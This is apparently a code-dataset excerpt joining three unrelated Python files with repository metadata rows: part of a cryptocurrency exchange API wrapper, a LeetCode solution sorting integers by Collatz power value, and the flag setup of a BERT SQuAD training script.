return result
raise ExchangeError(self.id + ' fetchOrderBook() returned unrecognized response: ' + self.json(response))
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetDetailMerged(self.extend(request, params))
#
# {
# "status": "ok",
# "ch": "market.btcusdt.detail.merged",
# "ts": 1583494336669,
# "tick": {
# "amount": 26228.672978342216,
# "open": 9078.95,
# "close": 9146.86,
# "high": 9155.41,
# "id": 209988544334,
# "count": 265846,
# "low": 8988.0,
# "version": 209988544334,
# "ask": [9146.87, 0.156134],
# "vol": 2.3822168242201668E8,
# "bid": [9146.86, 0.080758],
# }
# }
#
ticker = self.parse_ticker(response['tick'], market)
timestamp = self.safe_value(response, 'ts')
ticker['timestamp'] = timestamp
ticker['datetime'] = self.iso8601(timestamp)
return ticker
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.marketGetTickers(params)
tickers = self.safe_value(response, 'data')
timestamp = self.safe_integer(response, 'ts')
result = {}
for i in range(0, len(tickers)):
marketId = self.safe_string(tickers[i], 'symbol')
market = self.safe_market(marketId)
symbol = market['symbol']
ticker = self.parse_ticker(tickers[i], market)
ticker['timestamp'] = timestamp
ticker['datetime'] = self.iso8601(timestamp)
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "amount": 0.010411000000000000,
# "trade-id": 102090736910,
# "ts": 1583497692182,
# "id": 10500517034273194594947,
# "price": 9096.050000000000000000,
# "direction": "sell"
# }
#
# fetchMyTrades(private)
#
# {
# 'symbol': 'swftcbtc',
# 'fee-currency': 'swftc',
# 'filled-fees': '0',
# 'source': 'spot-api',
# 'id': 83789509854000,
# 'type': 'buy-limit',
# 'order-id': 83711103204909,
# 'filled-points': '0.005826843283532154',
# 'fee-deduct-currency': 'ht',
# 'filled-amount': '45941.53',
# 'price': '0.0000001401',
# 'created-at': 1597933260729,
# 'match-id': 100087455560,
# 'role': 'maker',
# 'trade-id': 100050305348
# },
#
marketId = self.safe_string(trade, 'symbol')
symbol = self.safe_symbol(marketId, market)
timestamp = self.safe_integer_2(trade, 'ts', 'created-at')
order = self.safe_string(trade, 'order-id')
side = self.safe_string(trade, 'direction')
type = self.safe_string(trade, 'type')
if type is not None:
typeParts = type.split('-')
side = typeParts[0]
type = typeParts[1]
takerOrMaker = self.safe_string(trade, 'role')
price = self.safe_float(trade, 'price')
amount = self.safe_float_2(trade, 'filled-amount', 'amount')
cost = None
if price is not None:
if amount is not None:
cost = amount * price
fee = None
feeCost = self.safe_float(trade, 'filled-fees')
feeCurrency = None
if market is not None:
feeCurrency = self.safe_currency_code(self.safe_string(trade, 'fee-currency'))
filledPoints = self.safe_float(trade, 'filled-points')
if filledPoints is not None:
if (feeCost is None) or (feeCost == 0.0):
feeCost = filledPoints
feeCurrency = self.safe_currency_code(self.safe_string(trade, 'fee-deduct-currency'))
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': feeCurrency,
}
tradeId = self.safe_string_2(trade, 'trade-id', 'tradeId')
id = self.safe_string(trade, 'id', tradeId)
return {
'id': id,
'info': trade,
'order': order,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': type,
'side': side,
'takerOrMaker': takerOrMaker,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = None
request = {}
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
if limit is not None:
request['size'] = limit # 1-100 orders, default is 100
if since is not None:
request['start-date'] = self.ymd(since) # maximum query window size is 2 days, query window shift should be within past 120 days
response = self.privateGetOrderMatchresults(self.extend(request, params))
trades = self.parse_trades(response['data'], market, since, limit)
return trades
def fetch_trades(self, symbol, since=None, limit=1000, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['size'] = limit
response = self.marketGetHistoryTrade(self.extend(request, params))
#
# {
# "status": "ok",
# "ch": "market.btcusdt.trade.detail",
# "ts": 1583497692365,
# "data": [
# {
# "id": 105005170342,
# "ts": 1583497692182,
# "data": [
# {
# "amount": 0.010411000000000000,
# "trade-id": 102090736910,
# "ts": 1583497692182,
# "id": 10500517034273194594947,
# "price": 9096.050000000000000000,
# "direction": "sell"
# }
# ]
# },
# # ...
# ]
# }
#
data = self.safe_value(response, 'data')
result = []
for i in range(0, len(data)):
trades = self.safe_value(data[i], 'data', [])
for j in range(0, len(trades)):
trade = self.parse_trade(trades[j], market)
result.append(trade)
result = self.sort_by(result, 'timestamp')
return self.filter_by_symbol_since_limit(result, symbol, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "amount":1.2082,
# "open":0.025096,
# "close":0.025095,
# "high":0.025096,
# "id":1591515300,
# "count":6,
# "low":0.025095,
# "vol":0.0303205097
# }
#
return [
self.safe_timestamp(ohlcv, 'id'),
self.safe_float(ohlcv, 'open'),
self.safe_float(ohlcv, 'high'),
self.safe_float(ohlcv, 'low'),
self.safe_float(ohlcv, 'close'),
self.safe_float(ohlcv, 'amount'),
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=1000, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'period': self.timeframes[timeframe],
}
if limit is not None:
request['size'] = limit
response = self.marketGetHistoryKline(self.extend(request, params))
#
# {
# "status":"ok",
# "ch":"market.ethbtc.kline.1min",
# "ts":1591515374371,
# "data":[
# {"amount":0.0,"open":0.025095,"close":0.025095,"high":0.025095,"id":1591515360,"count":0,"low":0.025095,"vol":0.0},
# {"amount":1.2082,"open":0.025096,"close":0.025095,"high":0.025096,"id":1591515300,"count":6,"low":0.025095,"vol":0.0303205097},
# {"amount":0.0648,"open":0.025096,"close":0.025096,"high":0.025096,"id":1591515240,"count":2,"low":0.025096,"vol":0.0016262208},
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_ohlcvs(data, market, timeframe, since, limit)
def fetch_accounts(self, params={}):
self.load_markets()
response = self.privateGetAccountAccounts(params)
return response['data']
def fetch_currencies(self, params={}):
request = {
'language': self.options['language'],
}
response = self.publicGetSettingsCurrencys(self.extend(request, params))
currencies = self.safe_value(response, 'data')
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
#
# { name: "ctxc",
# 'display-name': "CTXC",
# 'withdraw-precision': 8,
# 'currency-type': "eth",
# 'currency-partition': "pro",
# 'support-sites': null,
# 'otc-enable': 0,
# 'deposit-min-amount': "2",
# 'withdraw-min-amount': "4",
# 'show-precision': "8",
# weight: "2988",
# visible: True,
# 'deposit-desc': "Please don’t deposit any other digital assets except CTXC t…",
# 'withdraw-desc': "Minimum withdrawal amount: 4 CTXC. not >_<not For security reason…",
# 'deposit-enabled': True,
# 'withdraw-enabled': True,
# 'currency-addr-with-tag': False,
# 'fast-confirms': 15,
# 'safe-confirms': 30 }
#
id = self.safe_value(currency, 'name')
precision = self.safe_integer(currency, 'withdraw-precision')
code = self.safe_currency_code(id)
active = currency['visible'] and currency['deposit-enabled'] and currency['withdraw-enabled']
name = self.safe_string(currency, 'display-name')
result[code] = {
'id': id,
'code': code,
'type': 'crypto',
# 'payin': currency['deposit-enabled'],
# 'payout': currency['withdraw-enabled'],
# 'transfer': None,
'name': name,
'active': active,
'fee': None, # todo need to fetch from fee endpoint
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'price': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'cost': {
'min': None,
'max': None,
},
'deposit': {
'min': self.safe_float(currency, 'deposit-min-amount'),
'max': math.pow(10, precision),
},
'withdraw': {
'min': self.safe_float(currency, 'withdraw-min-amount'),
'max': math.pow(10, precision),
},
},
'info': currency,
}
return result
def fetch_balance(self, params={}):
self.load_markets()
self.load_accounts()
method = self.options['fetchBalanceMethod']
request = {
'id': self.accounts[0]['id'],
}
response = getattr(self, method)(self.extend(request, params))
balances = self.safe_value(response['data'], 'list', [])
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = None
if code in result:
account = result[code]
else:
account = self.account()
if balance['type'] == 'trade':
account['free'] = self.safe_float(balance, 'balance')
if balance['type'] == 'frozen':
account['used'] = self.safe_float(balance, 'balance')
result[code] = account
return self.parse_balance(result)
def fetch_orders_by_states(self, states, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {
'states': states,
}
market = None
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
method = self.safe_string(self.options, 'fetchOrdersByStatesMethod', 'private_get_order_orders')
response = getattr(self, method)(self.extend(request, params))
#
# {status: "ok",
# data: [{ id: 13997833014,
# symbol: "ethbtc",
# 'account-id': 3398321,
# amount: "0.045000000000000000",
# price: "0.034014000000000000",
# 'created-at': 1545836976871,
# type: "sell-limit",
# 'field-amount': "0.045000000000000000",
# 'field-cash-amount': "0.001530630000000000",
# 'field-fees': "0.000003061260000000",
# 'finished-at': 1545837948214,
# source: "spot-api",
# state: "filled",
# 'canceled-at': 0 } ]}
#
return self.parse_orders(response['data'], market, since, limit)
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'id': id,
}
response = self.privateGetOrderOrdersId(self.extend(request, params))
order = self.safe_value(response, 'data')
return self.parse_order(order)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_by_states('pre-submitted,submitted,partial-filled,filled,partial-canceled,canceled', symbol, since, limit, params)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
method = self.safe_string(self.options, 'fetchOpenOrdersMethod', 'fetch_open_orders_v1')
return getattr(self, method)(symbol, since, limit, params)
def fetch_open_orders_v1(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrdersV1 requires a symbol argument')
return self.fetch_orders_by_states('pre-submitted,submitted,partial-filled', symbol, since, limit, params)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_by_states('filled,partial-canceled,canceled', symbol, since, limit, params)
def fetch_open_orders_v2(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrders requires a symbol argument')
market = self.market(symbol)
accountId = self.safe_string(params, 'account-id')
if accountId is None:
# pick the first account
self.load_accounts()
for i in range(0, len(self.accounts)):
account = self.accounts[i]
if account['type'] == 'spot':
accountId = self.safe_string(account, 'id')
if accountId is not None:
break
request = {
'symbol': market['id'],
'account-id': accountId,
}
if limit is not None:
request['size'] = limit
omitted = self.omit(params, 'account-id')
response = self.privateGetOrderOpenOrders(self.extend(request, omitted))
#
# {
# "status":"ok",
# "data":[
# {
# "symbol":"ethusdt",
# "source":"api",
# "amount":"0.010000000000000000",
# "account-id":1528640,
# "created-at":1561597491963,
# "price":"400.000000000000000000",
# "filled-amount":"0.0",
# "filled-cash-amount":"0.0",
# "filled-fees":"0.0",
# "id":38477101630,
# "state":"submitted",
# "type":"sell-limit"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_orders(data, market, since, limit)
def parse_order_status(self, status):
statuses = {
'partial-filled': 'open',
'partial-canceled': 'canceled',
'filled': 'closed',
'canceled': 'canceled',
'submitted': 'open',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# { id: 13997833014,
# symbol: "ethbtc",
# 'account-id': 3398321,
# amount: "0.045000000000000000",
# price: "0.034014000000000000",
# 'created-at': 1545836976871,
# type: "sell-limit",
# 'field-amount': "0.045000000000000000", # they have fixed it for filled-amount
# 'field-cash-amount': "0.001530630000000000", # they have fixed it for filled-cash-amount
# 'field-fees': "0.000003061260000000", # they have fixed it for filled-fees
# 'finished-at': 1545837948214,
# source: "spot-api",
# state: "filled",
# 'canceled-at': 0 }
#
# { id: 20395337822,
# symbol: "ethbtc",
# 'account-id': 5685075,
# amount: "0.001000000000000000",
# price: "0.0",
# 'created-at': 1545831584023,
# type: "buy-market",
# 'field-amount': "0.029100000000000000", # they have fixed it for filled-amount
# 'field-cash-amount': "0.000999788700000000", # they have fixed it for filled-cash-amount
# 'field-fees': "0.000058200000000000", # they have fixed it for filled-fees
# 'finished-at': 1545831584181,
# source: "spot-api",
# state: "filled",
# 'canceled-at': 0 }
#
id = self.safe_string(order, 'id')
side = None
type = None
status = None
if 'type' in order:
orderType = order['type'].split('-')
side = orderType[0]
type = orderType[1]
status = self.parse_order_status(self.safe_string(order, 'state'))
marketId = self.safe_string(order, 'symbol')
symbol = self.safe_symbol(marketId, market)
timestamp = self.safe_integer(order, 'created-at')
amount = self.safe_float(order, 'amount')
filled = self.safe_float_2(order, 'filled-amount', 'field-amount') # typo in their API, filled amount
if (type == 'market') and (side == 'buy'):
amount = filled if (status == 'closed') else None
price = self.safe_float(order, 'price')
if price == 0.0:
price = None
cost = self.safe_float_2(order, 'filled-cash-amount', 'field-cash-amount') # same typo
remaining = None
average = None
if filled is not None:
if amount is not None:
remaining = amount - filled
# if cost is defined and filled is not zero
if (cost is not None) and (filled > 0):
average = cost / filled
feeCost = self.safe_float_2(order, 'filled-fees', 'field-fees') # typo in their API, filled fees
fee = None
if feeCost is not None:
feeCurrency = None
if market is not None:
feeCurrency = market['quote'] if (side == 'sell') else market['base']
fee = {
'cost': feeCost,
'currency': feeCurrency,
}
return {
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': None,
'side': side,
'price': price,
'stopPrice': None,
'average': average,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': fee,
'trades': None,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
self.load_accounts()
market = self.market(symbol)
request = {
'account-id': self.accounts[0]['id'],
'symbol': market['id'],
'type': side + '-' + type,
}
if (type == 'market') and (side == 'buy'):
if self.options['createMarketBuyOrderRequiresPrice']:
if price is None:
raise InvalidOrder(self.id + " market buy order requires price argument to calculate cost(total amount of quote currency to spend for buying, amount * price). To switch off self warning exception and specify cost in the amount argument, set .options['createMarketBuyOrderRequiresPrice'] = False. Make sure you know what you're doing.")
else:
# despite that cost = amount * price is in quote currency and should have quote precision
# the exchange API requires the cost supplied in 'amount' to be of base precision
# more about it here:
# https://github.com/ccxt/ccxt/pull/4395
# https://github.com/ccxt/ccxt/issues/7611
# we use amountToPrecision here because the exchange requires cost in base precision
request['amount'] = self.cost_to_precision(symbol, float(amount) * float(price))
else:
request['amount'] = self.cost_to_precision(symbol, amount)
else:
request['amount'] = self.amount_to_precision(symbol, amount)
if type == 'limit' or type == 'ioc' or type == 'limit-maker':
request['price'] = self.price_to_precision(symbol, price)
method = self.options['createOrderMethod']
response = getattr(self, method)(self.extend(request, params))
timestamp = self.milliseconds()
id = self.safe_string(response, 'data')
return {
'info': response,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'status': None,
'symbol': symbol,
'type': type,
'side': side,
'price': price,
'amount': amount,
'filled': None,
'remaining': None,
'cost': None,
'trades': None,
'fee': None,
'clientOrderId': None,
'average': None,
}
def cancel_order(self, id, symbol=None, params={}):
response = self.privatePostOrderOrdersIdSubmitcancel({'id': id})
#
# response = {
# 'status': 'ok',
# 'data': '10138899000',
# }
#
return self.extend(self.parse_order(response), {
'id': id,
'status': 'canceled',
})
def currency_to_precision(self, currency, fee):
return self.decimal_to_precision(fee, 0, self.currencies[currency]['precision'])
def calculate_fee(self, symbol, type, side, amount, price, takerOrMaker='taker', params={}):
market = self.markets[symbol]
rate = market[takerOrMaker]
cost = amount * rate
key = 'quote'
if side == 'sell':
cost *= price
else:
key = 'base'
return {
'type': takerOrMaker,
'currency': market[key],
'rate': rate,
'cost': float(self.currency_to_precision(market[key], cost)),
}
def parse_deposit_address(self, depositAddress, currency=None):
#
# {
# currency: "eth",
# address: "0xf7292eb9ba7bc50358e27f0e025a4d225a64127b",
# addressTag: "",
# chain: "eth"
# }
#
address = self.safe_string(depositAddress, 'address')
tag = self.safe_string(depositAddress, 'addressTag')
currencyId = self.safe_string(depositAddress, 'currency')
code = self.safe_currency_code(currencyId)
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': depositAddress,
}
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.v2PrivateGetAccountDepositAddress(self.extend(request, params))
#
# {
# code: 200,
# data: [
# {
# currency: "eth",
# address: "0xf7292eb9ba7bc50358e27f0e025a4d225a64127b",
# addressTag: "",
# chain: "eth"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_deposit_address(self.safe_value(data, 0, {}), currency)
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
if limit is None or limit > 100:
limit = 100
self.load_markets()
currency = None
if code is not None:
currency = self.currency(code)
request = {
'type': 'deposit',
'from': 0, # From 'id' ... if you want to get results after a particular transaction id, pass the id in params.from
}
if currency is not None:
request['currency'] = currency['id']
if limit is not None:
request['size'] = limit # max 100
response = self.privateGetQueryDepositWithdraw(self.extend(request, params))
# return response
return self.parse_transactions(response['data'], currency, since, limit)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
if limit is None or limit > 100:
limit = 100
self.load_markets()
currency = None
if code is not None:
currency = self.currency(code)
request = {
'type': 'withdraw',
'from': 0, # From 'id' ... if you want to get results after a particular transaction id, pass the id in params.from
}
if currency is not None:
request['currency'] = currency['id']
if limit is not None:
request['size'] = limit # max 100
response = self.privateGetQueryDepositWithdraw(self.extend(request, params))
# return response
return self.parse_transactions(response['data'], currency, since, limit)
def parse_transaction(self, transaction, currency=None):
#
# fetchDeposits
#
# {
# 'id': 8211029,
# 'type': 'deposit',
# 'currency': 'eth',
# 'chain': 'eth',
# 'tx-hash': 'bd315....',
# 'amount': 0.81162421,
# 'address': '4b8b....',
# 'address-tag': '',
# 'fee': 0,
# 'state': 'safe',
# 'created-at': 1542180380965,
# 'updated-at': 1542180788077
# }
#
# fetchWithdrawals
#
# {
# 'id': 6908275,
# 'type': 'withdraw',
# 'currency': 'btc',
# 'chain': 'btc',
# 'tx-hash': 'c1a1a....',
# 'amount': 0.80257005,
# 'address': '1QR....',
# 'address-tag': '',
# 'fee': 0.0005,
# 'state': 'confirmed',
# 'created-at': 1552107295685,
# 'updated-at': 1552108032859
# }
#
timestamp = self.safe_integer(transaction, 'created-at')
updated = self.safe_integer(transaction, 'updated-at')
code = self.safe_currency_code(self.safe_string(transaction, 'currency'))
type = self.safe_string(transaction, 'type')
if type == 'withdraw':
type = 'withdrawal'
status = self.parse_transaction_status(self.safe_string(transaction, 'state'))
tag = self.safe_string(transaction, 'address-tag')
feeCost = self.safe_float(transaction, 'fee')
if feeCost is not None:
feeCost = abs(feeCost)
return {
'info': transaction,
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'tx-hash'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': self.safe_string(transaction, 'address'),
'tag': tag,
'type': type,
'amount': self.safe_float(transaction, 'amount'),
'currency': code,
'status': status,
'updated': updated,
'fee': {
'currency': code,
'cost': feeCost,
'rate': None,
},
}
def parse_transaction_status(self, status):
statuses = {
# deposit statuses
'unknown': 'failed',
'confirming': 'pending',
'confirmed': 'ok',
'safe': 'ok',
'orphan': 'failed',
# withdrawal statuses
'submitted': 'pending',
'canceled': 'canceled',
'reexamine': 'pending',
'reject': 'failed',
'pass': 'pending',
'wallet-reject': 'failed',
# 'confirmed': 'ok', # present in deposit statuses
'confirm-error': 'failed',
'repealed': 'failed',
'wallet-transfer': 'pending',
'pre-transfer': 'pending',
}
return self.safe_string(statuses, status, status)
def withdraw(self, code, amount, address, tag=None, params={}):
self.load_markets()
self.check_address(address)
currency = self.currency(code)
request = {
'address': address, # only supports existing addresses in your withdraw address list
'amount': amount,
'currency': currency['id'].lower(),
}
if tag is not None:
request['addr-tag'] = tag # only for XRP?
response = self.privatePostDwWithdrawApiCreate(self.extend(request, params))
id = self.safe_string(response, 'data')
return {
'info': response,
'id': id,
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = '/'
if api == 'market':
url += api
elif (api == 'public') or (api == 'private'):
url += self.version
elif (api == 'v2Public') or (api == 'v2Private'):
url += 'v2'
url += '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'private' or api == 'v2Private':
self.check_required_credentials()
timestamp = self.ymdhms(self.milliseconds(), 'T')
request = {
'SignatureMethod': 'HmacSHA256',
'SignatureVersion': '2',
'AccessKeyId': self.apiKey,
'Timestamp': timestamp,
}
if method != 'POST':
request = self.extend(request, query)
request = self.keysort(request)
auth = self.urlencode(request)
# unfortunately, PHP demands double quotes for the escaped newline symbol
# eslint-disable-next-line quotes
payload = "\n".join([method, self.hostname, url, auth])
signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha256, 'base64')
auth += '&' + self.urlencode({'Signature': signature})
url += '?' + auth
if method == 'POST':
body = self.json(query)
headers = {
'Content-Type': 'application/json',
}
else:
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
else:
if params:
url += '?' + self.urlencode(params)
url = self.implode_params(self.urls['api'][api], {
'hostname': self.hostname,
}) + url
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return # fallback to default error handler
if 'status' in response:
#
# {"status":"error","err-code":"order-limitorder-amount-min-error","err-msg":"limit order amount error, min: `0.001`","data":null}
#
status = self.safe_string(response, 'status')
if status == 'error':
code = self.safe_string(response, 'err-code')
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], code, feedback)
message = self.safe_string(response, 'err-msg')
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
raise ExchangeError(feedback)
| 43.712751 | 355 | 0.48267 |
6d32a836d65abd1ee5d2fe4347e09f02459c9feb | 2,097 | py | Python | ALGO/05_Graph/SortIntByPowerValue.py | dushyantbhatt2007/DS-AND-ALGO | 2d4639cab8ae5fc87ce93f23d2d557652f729d93 | [
"MIT"
] | 1 | 2021-01-03T23:06:41.000Z | 2021-01-03T23:06:41.000Z | ALGO/05_Graph/SortIntByPowerValue.py | dushyantbhatt2007/data-structure-and-algo | 2d4639cab8ae5fc87ce93f23d2d557652f729d93 | [
"MIT"
] | null | null | null | ALGO/05_Graph/SortIntByPowerValue.py | dushyantbhatt2007/data-structure-and-algo | 2d4639cab8ae5fc87ce93f23d2d557652f729d93 | [
"MIT"
] | null | null | null | '''
The power of an integer x is defined as the number of steps needed to transform x into 1 using the following steps:
if x is even then x = x / 2
if x is odd then x = 3 * x + 1
For example, the power of x = 3 is 7 because 3 needs 7 steps to become 1 (3 --> 10 --> 5 --> 16 --> 8 --> 4 --> 2 --> 1).
Given three integers lo, hi and k. The task is to sort all integers in the interval [lo, hi] by the power value in ascending order, if two or more integers have the same power value sort them by ascending order.
Return the k-th integer in the range [lo, hi] sorted by the power value.
Notice that for any integer x (lo <= x <= hi) it is guaranteed that x will transform into 1 using these steps and that the power of x is will fit in 32 bit signed integer.
Example 1:
Input: lo = 12, hi = 15, k = 2
Output: 13
Explanation: The power of 12 is 9 (12 --> 6 --> 3 --> 10 --> 5 --> 16 --> 8 --> 4 --> 2 --> 1)
The power of 13 is 9
The power of 14 is 17
The power of 15 is 17
The interval sorted by the power value [12,13,14,15]. For k = 2 answer is the second element which is 13.
Notice that 12 and 13 have the same power value and we sorted them in ascending order. Same for 14 and 15.
Example 2:
Input: lo = 1, hi = 1, k = 1
Output: 1
Example 3:
Input: lo = 7, hi = 11, k = 4
Output: 7
Explanation: The power array corresponding to the interval [7, 8, 9, 10, 11] is [16, 3, 19, 6, 14].
The interval sorted by power is [8, 10, 11, 7, 9].
The fourth number in the sorted array is 7.
Example 4:
Input: lo = 10, hi = 20, k = 5
Output: 13
Example 5:
Input: lo = 1, hi = 1000, k = 777
Output: 570
Constraints:
1 <= lo <= hi <= 1000
1 <= k <= hi - lo + 1
'''
class Solution:
def getKth(self, lo: int, hi: int, k: int) -> int:
def dfs(x):
if x == 1: return 0
return 1 + (dfs(3 * x + 1) if x%2==1 else dfs(x/2))
result = {}
for i in range(lo, hi + 1):
result[i] = dfs(i)
return sorted(result, key=result.get)[k-1]
if __name__ == "__main__":
solution = Solution()
print(solution.getKth(10, 20, 5))
| 26.544304 | 211 | 0.622794 |
527e0537f679f0ee56082913dd5a60d43513d58e | 47,951 | py | Python | language/bert_extraction/steal_bert_qa/models/run_squad.py | Xtuden-com/language | 70c0328968d5ffa1201c6fdecde45bbc4fec19fc | [
"Apache-2.0"
] | 1,199 | 2018-10-16T01:30:18.000Z | 2022-03-31T21:05:24.000Z | language/bert_extraction/steal_bert_qa/models/run_squad.py | Xtuden-com/language | 70c0328968d5ffa1201c6fdecde45bbc4fec19fc | [
"Apache-2.0"
] | 116 | 2018-10-18T03:31:46.000Z | 2022-03-24T13:40:50.000Z | language/bert_extraction/steal_bert_qa/models/run_squad.py | Xtuden-com/language | 70c0328968d5ffa1201c6fdecde45bbc4fec19fc | [
"Apache-2.0"
] | 303 | 2018-10-22T12:35:12.000Z | 2022-03-27T17:38:17.000Z | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run BERT on SQuAD 1.1 and SQuAD 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import math
import os
import random
from bert import modeling
from bert import optimization
from bert import tokenization
import six
from six.moves import range
import tensorflow.compat.v1 as tf
from tensorflow.contrib import cluster_resolver as contrib_cluster_resolver
from tensorflow.contrib import data as contrib_data
from tensorflow.contrib import tpu as contrib_tpu
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string("vocab_file", None,
"The vocabulary file that the BERT model was trained on.")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string("train_file", None,
"SQuAD json for training. E.g., train-v1.1.json")
## Other parameters
flags.DEFINE_string("exp_name", "default_experiment",
"Unique experiment name to prevent file collisions")
flags.DEFINE_string(
"predict_input_file", None,
"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json")
flags.DEFINE_string("predict_output_dir", None,
"Output directory for prediction outputs.")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_bool(
"do_lower_case", True,
"Whether to lower case the input text. Should be True for uncased "
"models and False for cased models.")
flags.DEFINE_integer(
"max_seq_length", 384,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded.")
flags.DEFINE_integer(
"doc_stride", 128,
"When splitting up a long document into chunks, how much stride to "
"take between chunks.")
flags.DEFINE_integer(
"max_query_length", 64,
"The maximum number of tokens for the question. Questions longer than "
"this will be truncated to this length.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("predict_batch_size", 8,
"Total batch size for predictions.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_float("num_train_epochs", 3.0,
"Total number of training epochs to perform.")
flags.DEFINE_float(
"warmup_proportion", 0.1,
"Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10% of training.")
flags.DEFINE_integer("save_checkpoints_steps", 5000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer(
"n_best_size", 20,
"The total number of n-best predictions to generate in the "
"nbest_predictions.json output file.")
flags.DEFINE_integer(
"max_answer_length", 30,
"The maximum length of an answer that can be generated. This is needed "
"because the start and end predictions are not conditioned on one another.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the warnings related to data processing will be printed. "
"A number of warnings are expected for a normal SQuAD evaluation.")
flags.DEFINE_bool(
"version_2_with_negative", False,
"If true, the SQuAD examples contain some that do not have an answer.")
flags.DEFINE_float(
"null_score_diff_threshold", 0.0,
